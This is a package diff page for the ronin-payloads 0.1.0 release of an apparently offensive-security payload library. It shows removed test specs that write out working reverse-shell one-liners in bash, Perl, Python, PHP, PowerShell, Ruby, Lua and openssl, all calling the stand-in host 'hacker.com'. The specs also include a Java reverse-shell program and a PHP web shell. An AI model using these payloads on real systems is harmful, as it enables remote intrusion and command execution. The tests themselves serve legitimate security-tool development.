ronin-payloads 0.1.0.beta1 → 0.1.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (227) hide show
  1. checksums.yaml +4 -4
  2. data/.github/workflows/ruby.yml +1 -0
  3. data/.yardopts +1 -1
  4. data/README.md +4 -3
  5. data/bin/ronin-payloads +1 -1
  6. data/gemspec.yml +8 -7
  7. data/lib/ronin/payloads/asm_payload.rb +1 -1
  8. data/lib/ronin/payloads/binary_payload.rb +1 -1
  9. data/lib/ronin/payloads/builtin/cmd/awk/reverse_shell.rb +1 -1
  10. data/lib/ronin/payloads/builtin/cmd/bash/reverse_shell.rb +1 -1
  11. data/lib/ronin/payloads/builtin/cmd/lua/reverse_shell.rb +1 -1
  12. data/lib/ronin/payloads/builtin/cmd/node/reverse_shell.rb +1 -1
  13. data/lib/ronin/payloads/builtin/cmd/openssl/reverse_shell.rb +1 -1
  14. data/lib/ronin/payloads/builtin/cmd/perl/reverse_shell.rb +1 -1
  15. data/lib/ronin/payloads/builtin/cmd/php/reverse_shell.rb +1 -1
  16. data/lib/ronin/payloads/builtin/cmd/powershell/reverse_shell.rb +1 -1
  17. data/lib/ronin/payloads/builtin/cmd/python/reverse_shell.rb +1 -1
  18. data/lib/ronin/payloads/builtin/cmd/ruby/reverse_shell.rb +1 -1
  19. data/lib/ronin/payloads/builtin/java/reverse_shell.rb +1 -1
  20. data/lib/ronin/payloads/builtin/php/cmd_exec.rb +1 -1
  21. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/bind_shell.rb +1 -1
  22. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/exec_shell.rb +1 -1
  23. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86/reverse_shell.rb +1 -1
  24. data/lib/ronin/payloads/builtin/shellcode/freebsd/x86_64/exec_shell.rb +1 -1
  25. data/lib/ronin/payloads/builtin/shellcode/linux/arm/bind_shell.rb +1 -1
  26. data/lib/ronin/payloads/builtin/shellcode/linux/arm/exec_shell.rb +1 -1
  27. data/lib/ronin/payloads/builtin/shellcode/linux/arm/reverse_shell.rb +1 -1
  28. data/lib/ronin/payloads/builtin/shellcode/linux/mips/bind_shell.rb +1 -1
  29. data/lib/ronin/payloads/builtin/shellcode/linux/mips/exec_shell.rb +1 -1
  30. data/lib/ronin/payloads/builtin/shellcode/linux/mips/reverse_shell.rb +1 -1
  31. data/lib/ronin/payloads/builtin/shellcode/linux/ppc/exec_shell.rb +1 -1
  32. data/lib/ronin/payloads/builtin/shellcode/linux/ppc/reverse_shell.rb +1 -1
  33. data/lib/ronin/payloads/builtin/shellcode/linux/x86/bind_shell.rb +2 -2
  34. data/lib/ronin/payloads/builtin/shellcode/linux/x86/exec_shell.rb +1 -1
  35. data/lib/ronin/payloads/builtin/shellcode/linux/x86/reverse_shell.rb +1 -1
  36. data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/bind_shell.rb +2 -2
  37. data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/exec_shell.rb +1 -1
  38. data/lib/ronin/payloads/builtin/shellcode/linux/x86_64/reverse_shell.rb +1 -1
  39. data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/exec_shell.rb +1 -1
  40. data/lib/ronin/payloads/builtin/shellcode/macos/x86_64/reverse_shell.rb +1 -1
  41. data/lib/ronin/payloads/builtin/shellcode/netbsd/x86/exec_shell.rb +1 -1
  42. data/lib/ronin/payloads/builtin/shellcode/netbsd/x86/reverse_shell.rb +1 -1
  43. data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/bind_shell.rb +1 -1
  44. data/lib/ronin/payloads/builtin/shellcode/openbsd/x86/exec_shell.rb +1 -1
  45. data/lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb +1 -1
  46. data/lib/ronin/payloads/builtin/test/open_redirect.rb +1 -1
  47. data/lib/ronin/payloads/builtin/test/xss.rb +1 -1
  48. data/lib/ronin/payloads/c_payload.rb +1 -1
  49. data/lib/ronin/payloads/cli/command.rb +1 -1
  50. data/lib/ronin/payloads/cli/commands/build.rb +1 -1
  51. data/lib/ronin/payloads/cli/commands/encode.rb +1 -1
  52. data/lib/ronin/payloads/cli/commands/encoder.rb +1 -1
  53. data/lib/ronin/payloads/cli/commands/encoders.rb +2 -2
  54. data/lib/ronin/payloads/cli/commands/irb.rb +1 -1
  55. data/lib/ronin/payloads/cli/commands/launch.rb +1 -1
  56. data/lib/ronin/payloads/cli/commands/list.rb +1 -1
  57. data/lib/ronin/payloads/cli/commands/new.rb +3 -3
  58. data/lib/ronin/payloads/cli/commands/show.rb +2 -2
  59. data/lib/ronin/payloads/cli/encoder_methods.rb +1 -1
  60. data/lib/ronin/payloads/cli/format_option.rb +1 -1
  61. data/lib/ronin/payloads/cli/generator/payload_types.rb +3 -3
  62. data/lib/ronin/payloads/cli/payload_command.rb +1 -1
  63. data/lib/ronin/payloads/cli/payload_methods.rb +1 -1
  64. data/lib/ronin/payloads/cli/printing.rb +1 -1
  65. data/lib/ronin/payloads/cli/ruby_shell.rb +1 -1
  66. data/lib/ronin/payloads/cli.rb +6 -1
  67. data/lib/ronin/payloads/coldfusion_payload.rb +1 -1
  68. data/lib/ronin/payloads/command_payload.rb +1 -1
  69. data/lib/ronin/payloads/encoders/builtin/html/encode.rb +1 -1
  70. data/lib/ronin/payloads/encoders/builtin/js/encode.rb +1 -1
  71. data/lib/ronin/payloads/encoders/builtin/powershell/encode.rb +1 -1
  72. data/lib/ronin/payloads/encoders/builtin/shell/encode.rb +1 -1
  73. data/lib/ronin/payloads/encoders/builtin/sql/encode.rb +1 -1
  74. data/lib/ronin/payloads/encoders/builtin/xml/encode.rb +1 -1
  75. data/lib/ronin/payloads/encoders/encoder.rb +1 -1
  76. data/lib/ronin/payloads/encoders/exceptions.rb +1 -1
  77. data/lib/ronin/payloads/encoders/html_encoder.rb +1 -1
  78. data/lib/ronin/payloads/encoders/javascript_encoder.rb +1 -1
  79. data/lib/ronin/payloads/encoders/pipeline.rb +2 -2
  80. data/lib/ronin/payloads/encoders/powershell_encoder.rb +1 -1
  81. data/lib/ronin/payloads/encoders/registry.rb +1 -1
  82. data/lib/ronin/payloads/encoders/shell_encoder.rb +1 -1
  83. data/lib/ronin/payloads/encoders/sql_encoder.rb +1 -1
  84. data/lib/ronin/payloads/encoders/xml_encoder.rb +1 -1
  85. data/lib/ronin/payloads/encoders.rb +1 -1
  86. data/lib/ronin/payloads/exceptions.rb +1 -1
  87. data/lib/ronin/payloads/go_payload.rb +1 -1
  88. data/lib/ronin/payloads/html_payload.rb +1 -1
  89. data/lib/ronin/payloads/java_payload.rb +1 -1
  90. data/lib/ronin/payloads/javascript_payload.rb +1 -1
  91. data/lib/ronin/payloads/jsp_payload.rb +1 -1
  92. data/lib/ronin/payloads/metadata/arch.rb +1 -1
  93. data/lib/ronin/payloads/metadata/os.rb +1 -1
  94. data/lib/ronin/payloads/mixins/binary.rb +1 -1
  95. data/lib/ronin/payloads/mixins/bind_shell.rb +1 -1
  96. data/lib/ronin/payloads/mixins/build_dir.rb +1 -1
  97. data/lib/ronin/payloads/mixins/erb.rb +1 -1
  98. data/lib/ronin/payloads/mixins/network.rb +1 -1
  99. data/lib/ronin/payloads/mixins/post_ex.rb +1 -1
  100. data/lib/ronin/payloads/mixins/resolve_host.rb +1 -1
  101. data/lib/ronin/payloads/mixins/reverse_shell.rb +1 -1
  102. data/lib/ronin/payloads/mixins/tempfile.rb +1 -1
  103. data/lib/ronin/payloads/mixins/typescript.rb +1 -1
  104. data/lib/ronin/payloads/node_js_payload.rb +1 -1
  105. data/lib/ronin/payloads/payload.rb +1 -1
  106. data/lib/ronin/payloads/php_payload.rb +1 -1
  107. data/lib/ronin/payloads/powershell_payload.rb +1 -1
  108. data/lib/ronin/payloads/python_payload.rb +1 -1
  109. data/lib/ronin/payloads/registry.rb +1 -1
  110. data/lib/ronin/payloads/root.rb +1 -1
  111. data/lib/ronin/payloads/ruby_payload.rb +1 -1
  112. data/lib/ronin/payloads/rust_payload.rb +1 -1
  113. data/lib/ronin/payloads/shell_payload.rb +1 -1
  114. data/lib/ronin/payloads/shellcode/bind_shell_payload.rb +1 -1
  115. data/lib/ronin/payloads/shellcode/exec_shell_payload.rb +1 -1
  116. data/lib/ronin/payloads/shellcode/reverse_shell_payload.rb +1 -1
  117. data/lib/ronin/payloads/shellcode_payload.rb +1 -1
  118. data/lib/ronin/payloads/sql_payload.rb +1 -1
  119. data/lib/ronin/payloads/url_payload.rb +2 -2
  120. data/lib/ronin/payloads/version.rb +2 -2
  121. data/lib/ronin/payloads/xml_payload.rb +1 -1
  122. data/lib/ronin/payloads.rb +1 -1
  123. data/ronin-payloads.gemspec +2 -1
  124. metadata +16 -215
  125. data/spec/asm_payload_spec.rb +0 -114
  126. data/spec/binary_payload_spec.rb +0 -8
  127. data/spec/builtin/cmd/awk/reverse_shell_spec.rb +0 -38
  128. data/spec/builtin/cmd/bash/reverse_shell_spec.rb +0 -36
  129. data/spec/builtin/cmd/lua/reverse_shell_spec.rb +0 -38
  130. data/spec/builtin/cmd/node/reverse_shell_spec.rb +0 -36
  131. data/spec/builtin/cmd/openssl/reverse_shell_spec.rb +0 -38
  132. data/spec/builtin/cmd/perl/reverse_shell_spec.rb +0 -38
  133. data/spec/builtin/cmd/php/reverse_shell_spec.rb +0 -38
  134. data/spec/builtin/cmd/powershell/reverse_shell_spec.rb +0 -38
  135. data/spec/builtin/cmd/python/reverse_shell_spec.rb +0 -38
  136. data/spec/builtin/cmd/ruby/reverse_shell_spec.rb +0 -38
  137. data/spec/builtin/java/reverse_shell_spec.rb +0 -103
  138. data/spec/builtin/php/cmd_exec.rb +0 -52
  139. data/spec/builtin/shellcode/freebsd/x86/bind_shell_spec.rb +0 -58
  140. data/spec/builtin/shellcode/freebsd/x86/exec_shell_spec.rb +0 -46
  141. data/spec/builtin/shellcode/freebsd/x86/reverse_shell_spec.rb +0 -63
  142. data/spec/builtin/shellcode/freebsd/x86_64/exec_shell_spec.rb +0 -46
  143. data/spec/builtin/shellcode/linux/arm/bind_shell_spec.rb +0 -62
  144. data/spec/builtin/shellcode/linux/arm/exec_shell_spec.rb +0 -46
  145. data/spec/builtin/shellcode/linux/arm/reverse_shell_spec.rb +0 -58
  146. data/spec/builtin/shellcode/linux/mips/bind_shell_spec.rb +0 -60
  147. data/spec/builtin/shellcode/linux/mips/exec_shell_spec.rb +0 -46
  148. data/spec/builtin/shellcode/linux/mips/reverse_shell_spec.rb +0 -58
  149. data/spec/builtin/shellcode/linux/ppc/exec_shell_spec.rb +0 -46
  150. data/spec/builtin/shellcode/linux/ppc/reverse_shell_spec.rb +0 -87
  151. data/spec/builtin/shellcode/linux/x86/bind_shell_spec.rb +0 -60
  152. data/spec/builtin/shellcode/linux/x86/exec_shell_spec.rb +0 -46
  153. data/spec/builtin/shellcode/linux/x86/reverse_shell_spec.rb +0 -58
  154. data/spec/builtin/shellcode/linux/x86_64/bind_shell_spec.rb +0 -60
  155. data/spec/builtin/shellcode/linux/x86_64/exec_shell_spec.rb +0 -46
  156. data/spec/builtin/shellcode/linux/x86_64/reverse_shell_spec.rb +0 -58
  157. data/spec/builtin/shellcode/macos/x86_64/exec_shell_spec.rb +0 -46
  158. data/spec/builtin/shellcode/macos/x86_64/reverse_shell_spec.rb +0 -58
  159. data/spec/builtin/shellcode/netbsd/x86/exec_shell_spec.rb +0 -46
  160. data/spec/builtin/shellcode/netbsd/x86/reverse_shell_spec.rb +0 -63
  161. data/spec/builtin/shellcode/openbsd/x86/bind_shell_spec.rb +0 -58
  162. data/spec/builtin/shellcode/openbsd/x86/exec_shell_spec.rb +0 -46
  163. data/spec/builtin/shellcode/windows/x86_64/cmd_spec.rb +0 -54
  164. data/spec/builtin/test/open_redirect_spec.rb +0 -24
  165. data/spec/builtin/test/xss_spec.rb +0 -24
  166. data/spec/c_payload_spec.rb +0 -139
  167. data/spec/cli/commands/show_spec.rb +0 -21
  168. data/spec/cli/encoder_methods_spec.rb +0 -275
  169. data/spec/cli/format_option_spec.rb +0 -187
  170. data/spec/cli/payload_command_spec.rb +0 -68
  171. data/spec/cli/payload_methods_spec.rb +0 -208
  172. data/spec/cli/printing_spec.rb +0 -65
  173. data/spec/cli/ruby_shell_spec.rb +0 -14
  174. data/spec/coldfusion_payload_spec.rb +0 -8
  175. data/spec/command_payload_spec.rb +0 -8
  176. data/spec/encoders/builtin/html/encode_spec.rb +0 -17
  177. data/spec/encoders/builtin/js/encode_spec.rb +0 -17
  178. data/spec/encoders/builtin/powershell/encode_spec.rb +0 -17
  179. data/spec/encoders/builtin/shell/encode_spec.rb +0 -17
  180. data/spec/encoders/builtin/sql/encode_spec.rb +0 -17
  181. data/spec/encoders/builtin/xml/encode_spec.rb +0 -17
  182. data/spec/encoders/encoder_spec.rb +0 -62
  183. data/spec/encoders/html_encoder_spec.rb +0 -8
  184. data/spec/encoders/javascript_encoder_spec.rb +0 -8
  185. data/spec/encoders/pipeline_spec.rb +0 -153
  186. data/spec/encoders/powershell_encoder_spec.rb +0 -8
  187. data/spec/encoders/shell_encoder_spec.rb +0 -8
  188. data/spec/encoders/sql_encoder_spec.rb +0 -8
  189. data/spec/encoders/xml_encoder_spec.rb +0 -8
  190. data/spec/encoders_spec.rb +0 -25
  191. data/spec/go_payload_spec.rb +0 -56
  192. data/spec/helpers/encoders.rb +0 -9
  193. data/spec/helpers/payloads.rb +0 -9
  194. data/spec/helpers/scripts/payloads/simple.rb +0 -22
  195. data/spec/html_payload_spec.rb +0 -12
  196. data/spec/java_payload_spec.rb +0 -97
  197. data/spec/javascript_payload_spec.rb +0 -12
  198. data/spec/jsp_payload_spec.rb +0 -8
  199. data/spec/metadata/arch_spec.rb +0 -82
  200. data/spec/metadata/os_spec.rb +0 -164
  201. data/spec/mixins/binary_spec.rb +0 -129
  202. data/spec/mixins/bind_shell_spec.rb +0 -73
  203. data/spec/mixins/build_dir.rb +0 -64
  204. data/spec/mixins/erb_spec.rb +0 -19
  205. data/spec/mixins/network_spec.rb +0 -75
  206. data/spec/mixins/post_ex_spec.rb +0 -40
  207. data/spec/mixins/resolve_host_spec.rb +0 -322
  208. data/spec/mixins/reverse_shell_spec.rb +0 -103
  209. data/spec/mixins/tempfile_spec.rb +0 -97
  210. data/spec/mixins/typescript_spec.rb +0 -92
  211. data/spec/node_js_payload_spec.rb +0 -8
  212. data/spec/payload_spec.rb +0 -288
  213. data/spec/payloads_spec.rb +0 -29
  214. data/spec/php_payload_spec.rb +0 -8
  215. data/spec/powershell_payload_spec.rb +0 -16
  216. data/spec/python_payload_spec.rb +0 -8
  217. data/spec/ruby_payload_spec.rb +0 -8
  218. data/spec/rust_payload_spec.rb +0 -116
  219. data/spec/shell_payload_spec.rb +0 -16
  220. data/spec/shellcode/bind_shell_payload_spec.rb +0 -42
  221. data/spec/shellcode/exec_shell_payload_spec.rb +0 -8
  222. data/spec/shellcode/reverse_shell_payload_spec.rb +0 -136
  223. data/spec/shellcode_payload_spec.rb +0 -38
  224. data/spec/spec_helper.rb +0 -7
  225. data/spec/sql_payload_spec.rb +0 -12
  226. data/spec/url_payload_spec.rb +0 -72
  227. data/spec/xml_payload_spec.rb +0 -12
@@ -1,38 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/cmd/lua/reverse_shell'
3
-
4
- describe Ronin::Payloads::CMD::Lua::ReverseShell do
5
- it "must inherit from Ronin::Payloads::CommandPayload" do
6
- expect(described_class).to be < Ronin::Payloads::CommandPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'cmd/lua/reverse_shell'" do
13
- expect(subject.id).to eq('cmd/lua/reverse_shell')
14
- end
15
- end
16
-
17
- let(:host) { 'hacker.com' }
18
- let(:port) { 1337 }
19
-
20
- subject do
21
- described_class.new(
22
- params: {
23
- host: host,
24
- port: port
25
- }
26
- )
27
- end
28
-
29
- describe "#build" do
30
- before { subject.build }
31
-
32
- it "must build an `lua` command that connects back to the host and port params" do
33
- expect(subject.payload).to eq(
34
- %{lua -e "require('socket');require('os');t=socket.tcp();t:connect('#{host}','#{port}');os.execute('/bin/sh -i <&3 >&3 2>&3');"}
35
- )
36
- end
37
- end
38
- end
@@ -1,36 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/cmd/bash/reverse_shell'
3
-
4
- describe Ronin::Payloads::CMD::Bash::ReverseShell do
5
- it "must inherit from Ronin::Payloads::CommandPayload" do
6
- expect(described_class).to be < Ronin::Payloads::CommandPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'cmd/bash/reverse_shell'" do
13
- expect(subject.id).to eq('cmd/bash/reverse_shell')
14
- end
15
- end
16
-
17
- let(:host) { 'hacker.com' }
18
- let(:port) { 1337 }
19
-
20
- subject do
21
- described_class.new(
22
- params: {
23
- host: host,
24
- port: port
25
- }
26
- )
27
- end
28
-
29
- describe "#build" do
30
- before { subject.build }
31
-
32
- it "must build an `bash` command that connects back to the host and port params" do
33
- expect(subject.payload).to eq("bash -i >& /dev/tcp/#{host}/#{port} 0>&1")
34
- end
35
- end
36
- end
@@ -1,38 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/cmd/openssl/reverse_shell'
3
-
4
- describe Ronin::Payloads::CMD::OpenSSL::ReverseShell do
5
- it "must inherit from Ronin::Payloads::CommandPayload" do
6
- expect(described_class).to be < Ronin::Payloads::CommandPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'cmd/openssl/reverse_shell'" do
13
- expect(subject.id).to eq('cmd/openssl/reverse_shell')
14
- end
15
- end
16
-
17
- let(:host) { 'hacker.com' }
18
- let(:port) { 1337 }
19
-
20
- subject do
21
- described_class.new(
22
- params: {
23
- host: host,
24
- port: port
25
- }
26
- )
27
- end
28
-
29
- describe "#build" do
30
- before { subject.build }
31
-
32
- it "must build an `openssl` command that connects back to the host and port params" do
33
- expect(subject.payload).to eq(
34
- %{mkfifo fifo; /bin/sh -i < fifo 2>&1 | openssl s_client -quiet -connect #{host}:#{port} > fifo; rm fifo}
35
- )
36
- end
37
- end
38
- end
@@ -1,38 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/cmd/perl/reverse_shell'
3
-
4
- describe Ronin::Payloads::CMD::Perl::ReverseShell do
5
- it "must inherit from Ronin::Payloads::CommandPayload" do
6
- expect(described_class).to be < Ronin::Payloads::CommandPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'cmd/perl/reverse_shell'" do
13
- expect(subject.id).to eq('cmd/perl/reverse_shell')
14
- end
15
- end
16
-
17
- let(:host) { 'hacker.com' }
18
- let(:port) { 1337 }
19
-
20
- subject do
21
- described_class.new(
22
- params: {
23
- host: host,
24
- port: port
25
- }
26
- )
27
- end
28
-
29
- describe "#build" do
30
- before { subject.build }
31
-
32
- it "must build an `perl` command that connects back to the host and port params" do
33
- expect(subject.payload).to eq(
34
- %{perl -e 'use Socket;$i=#{host.dump};$p=#{port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'}
35
- )
36
- end
37
- end
38
- end
@@ -1,38 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/cmd/php/reverse_shell'
3
-
4
- describe Ronin::Payloads::CMD::PHP::ReverseShell do
5
- it "must inherit from Ronin::Payloads::CommandPayload" do
6
- expect(described_class).to be < Ronin::Payloads::CommandPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'cmd/php/reverse_shell'" do
13
- expect(subject.id).to eq('cmd/php/reverse_shell')
14
- end
15
- end
16
-
17
- let(:host) { 'hacker.com' }
18
- let(:port) { 1337 }
19
-
20
- subject do
21
- described_class.new(
22
- params: {
23
- host: host,
24
- port: port
25
- }
26
- )
27
- end
28
-
29
- describe "#build" do
30
- before { subject.build }
31
-
32
- it "must build an `php` command that connects back to the host and port params" do
33
- expect(subject.payload).to eq(
34
- %{php -r '$sock=fsockopen(#{host.dump},#{port});exec("/bin/sh -i <&3 >&3 2>&3");'}
35
- )
36
- end
37
- end
38
- end
@@ -1,38 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/cmd/powershell/reverse_shell'
3
-
4
- describe Ronin::Payloads::CMD::PowerShell::ReverseShell do
5
- it "must inherit from Ronin::Payloads::CommandPayload" do
6
- expect(described_class).to be < Ronin::Payloads::CommandPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'cmd/python/reverse_shell'" do
13
- expect(subject.id).to eq('cmd/powershell/reverse_shell')
14
- end
15
- end
16
-
17
- let(:host) { 'hacker.com' }
18
- let(:port) { 1337 }
19
-
20
- subject do
21
- described_class.new(
22
- params: {
23
- host: host,
24
- port: port
25
- }
26
- )
27
- end
28
-
29
- describe "#build" do
30
- before { subject.build }
31
-
32
- it "must build an `powershell` command that connects back to the host and port params" do
33
- expect(subject.payload).to eq(
34
- %{powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(#{host.dump},#{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}
35
- )
36
- end
37
- end
38
- end
@@ -1,38 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/cmd/python/reverse_shell'
3
-
4
- describe Ronin::Payloads::CMD::Python::ReverseShell do
5
- it "must inherit from Ronin::Payloads::CommandPayload" do
6
- expect(described_class).to be < Ronin::Payloads::CommandPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'cmd/python/reverse_shell'" do
13
- expect(subject.id).to eq('cmd/python/reverse_shell')
14
- end
15
- end
16
-
17
- let(:host) { 'hacker.com' }
18
- let(:port) { 1337 }
19
-
20
- subject do
21
- described_class.new(
22
- params: {
23
- host: host,
24
- port: port
25
- }
26
- )
27
- end
28
-
29
- describe "#build" do
30
- before { subject.build }
31
-
32
- it "must build an `python` command that connects back to the host and port params" do
33
- expect(subject.payload).to eq(
34
- %{python -c 'import socket,os,pty;s=socket.socket();s.connect((#{host.dump},#{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'}
35
- )
36
- end
37
- end
38
- end
@@ -1,38 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/cmd/ruby/reverse_shell'
3
-
4
- describe Ronin::Payloads::CMD::Ruby::ReverseShell do
5
- it "must inherit from Ronin::Payloads::CommandPayload" do
6
- expect(described_class).to be < Ronin::Payloads::CommandPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'cmd/ruby/reverse_shell'" do
13
- expect(subject.id).to eq('cmd/ruby/reverse_shell')
14
- end
15
- end
16
-
17
- let(:host) { 'hacker.com' }
18
- let(:port) { 1337 }
19
-
20
- subject do
21
- described_class.new(
22
- params: {
23
- host: host,
24
- port: port
25
- }
26
- )
27
- end
28
-
29
- describe "#build" do
30
- before { subject.build }
31
-
32
- it "must build an `ruby` command that connects back to the host and port params" do
33
- expect(subject.payload).to eq(
34
- %{ruby -rsocket -e'f=TCPSocket.open(#{host.dump},#{port}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'}
35
- )
36
- end
37
- end
38
- end
@@ -1,103 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/java/reverse_shell'
3
-
4
- describe Ronin::Payloads::Java::ReverseShell do
5
- it "must inherit from Ronin::Payloads::JavaPayload" do
6
- expect(described_class).to be < Ronin::Payloads::JavaPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'java/reverse_shell'" do
13
- expect(subject.id).to eq('java/reverse_shell')
14
- end
15
- end
16
-
17
- let(:host) { 'hacker.com' }
18
- let(:port) { 1337 }
19
-
20
- subject do
21
- described_class.new(
22
- params: {
23
- host: host,
24
- port: port
25
- }
26
- )
27
- end
28
-
29
- describe "#build" do
30
- before { subject.perform_build }
31
-
32
- it "must generate generate a new .java file containing the host and port" do
33
- expect(File.read(subject.java_file)).to eq(
34
- <<~JAVA
35
- import java.io.IOException;
36
- import java.io.InputStream;
37
- import java.io.OutputStream;
38
- import java.net.Socket;
39
-
40
- public class Payload
41
- {
42
- public static void main(String argv[]) throws Exception
43
- {
44
- String host = "#{host}";
45
- int port = #{port};
46
- String shell = "/bin/sh";
47
-
48
- Process process = new ProcessBuilder(shell).redirectErrorStream(true).start();
49
- Socket socket = new Socket(host,port);
50
-
51
- InputStream process_input =process.getInputStream();
52
- InputStream process_error = process.getErrorStream();
53
- InputStream socket_input = socket.getInputStream();
54
- OutputStream process_output = process.getOutputStream();
55
- OutputStream socket_output = socket.getOutputStream();
56
-
57
- while (!socket.isClosed())
58
- {
59
- while (process_input.available()>0)
60
- {
61
- socket_output.write(process_input.read());
62
- }
63
-
64
- while (process_error.available()>0)
65
- {
66
- socket_output.write(process_error.read());
67
- }
68
-
69
- while (socket_input.available()>0)
70
- {
71
- process_output.write(socket_input.read());
72
- }
73
-
74
- socket_output.flush();
75
- process_output.flush();
76
- Thread.sleep(50);
77
-
78
- try
79
- {
80
- process.exitValue();
81
- break;
82
- }
83
- catch (Exception e) {}
84
- };
85
-
86
- process.destroy();
87
- socket.close();
88
- }
89
- }
90
- JAVA
91
- )
92
- end
93
-
94
- it "must compile a new Java .class file" do
95
- expect(File.file?(subject.class_file)).to be(true)
96
- expect(File.empty?(subject.class_file)).to be(false)
97
- end
98
-
99
- it "must set #payload" do
100
- expect(subject.payload).to eq(File.binread(subject.class_file))
101
- end
102
- end
103
- end
@@ -1,52 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/php/cmd_exec'
3
-
4
- describe Ronin::Payloads::PHP::CmdExec do
5
- it "must inherit from Ronin::Payloads::JavaPayload" do
6
- expect(described_class).to be < Ronin::Payloads::PHPPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'php/cmd_exec'" do
13
- expect(subject.id).to eq('php/cmd_exec')
14
- end
15
- end
16
-
17
- describe "params" do
18
- describe "query_param" do
19
- it "must default to 'cmd'" do
20
- expect(subject.params[:query_param]).to eq('cmd')
21
- end
22
- end
23
- end
24
-
25
- describe "#build" do
26
- before { subject.build }
27
-
28
- it "must return PHP code that executes the command from the 'cmd' query_param and returns the output in <exec>...</exec> tags" do
29
- expect(subject.payload).to eq(
30
- %{<?php if(isset($_REQUEST["cmd")){echo "<exec>";passthru($_REQUEST["cmd"]);echo "</exec>";}?>}
31
- )
32
- end
33
-
34
- context "when the query_param param is set to a different value" do
35
- let(:query_param) { 'other' }
36
-
37
- subject do
38
- described_class.new(
39
- params: {
40
- query_param: query_param
41
- }
42
- )
43
- end
44
-
45
- it "must return PHP code that executes the command from the query_param and returns the output in <exec>...</exec> tags" do
46
- expect(subject.payload).to eq(
47
- %{<?php if(isset($_REQUEST["#{query_param}")){echo "<exec>";passthru($_REQUEST["#{query_param}"]);echo "</exec>";}?>}
48
- )
49
- end
50
- end
51
- end
52
- end
@@ -1,58 +0,0 @@
1
- require 'spec_helper'
2
- require 'ronin/payloads/builtin/shellcode/freebsd/x86/bind_shell'
3
-
4
- describe Ronin::Payloads::Shellcode::FreeBSD::X86::BindShell do
5
- it "must inherit from Ronin::Payloads::Shellcode::BindShellPayload" do
6
- expect(described_class).to be < Ronin::Payloads::Shellcode::BindShellPayload
7
- end
8
-
9
- describe ".id" do
10
- subject { described_class }
11
-
12
- it "must equal 'shellcode/freebsd/x86/bind_shell'" do
13
- expect(subject.id).to eq('shellcode/freebsd/x86/bind_shell')
14
- end
15
- end
16
-
17
- describe ".arch" do
18
- subject { described_class }
19
-
20
- it "must equal :x86" do
21
- expect(subject.arch).to be(:x86)
22
- end
23
- end
24
-
25
- describe ".os" do
26
- subject { described_class }
27
-
28
- it "must equal :freebsd" do
29
- expect(subject.os).to be(:freebsd)
30
- end
31
- end
32
-
33
- let(:host) { 'example.com' }
34
- let(:port) { 1337 }
35
-
36
- subject do
37
- described_class.new(
38
- params: {
39
- host: host,
40
- port: port
41
- }
42
- )
43
- end
44
-
45
- describe "#build" do
46
- before { subject.build }
47
-
48
- it "must set #payload" do
49
- expect(subject.payload).to eq(
50
